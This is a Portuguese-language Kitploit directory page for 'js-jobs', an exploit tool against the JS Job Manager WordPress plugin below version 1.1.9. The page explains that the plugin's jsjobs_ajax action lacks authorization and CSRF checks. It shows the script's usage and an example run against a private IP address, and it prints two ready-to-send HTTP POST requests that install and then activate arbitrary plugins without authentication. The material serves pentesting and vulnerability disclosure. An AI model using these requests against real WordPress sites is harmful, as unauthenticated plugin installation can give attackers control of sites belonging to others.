Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
js-jobs — JS Job Manager < 1.1.9 - Instalação/Ativação Arbitrária Não Autenticada de Plugin | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/js-jobs
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubrandomrobbiebf/js-jobs

js-jobs

JS Job Manager < 1.1.9 - Instalação/Ativação Arbitrária Não Autenticada de Plugin

Ver Repositório
1há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

js-jobs

JS Job Manager < 1.1.9 - Instalação/Ativação Arbitrária de Plugins Não Autenticada

Descrição

A ação AJAX jsjobs_ajax do plugin, disponível tanto para usuários autenticados quanto não autenticados, não possui verificações adequadas de autorização e CSRF, em particular ao usar installPluginFromAjax e activatePluginFromAjax, o que poderia permitir que atacantes não autenticados instalassem plugins arbitrários do repositório do WordPress e os ativassem (com alguma limitação).

Não há controle sobre a versão do plugin, então ele instalará a versão mais recente do plugin.

Como usar

root@kitploit:~
usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s

Exemplo

root@kitploit:~
$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.

Prova de Conceito

Para instalar um plugin:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close

action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug>

Para ativar um plugin (há uma limitação aqui, pois o plugin deve ter o arquivo /.php, caso contrário ele não será ativado):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close

action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug> 
Baixar ferramenta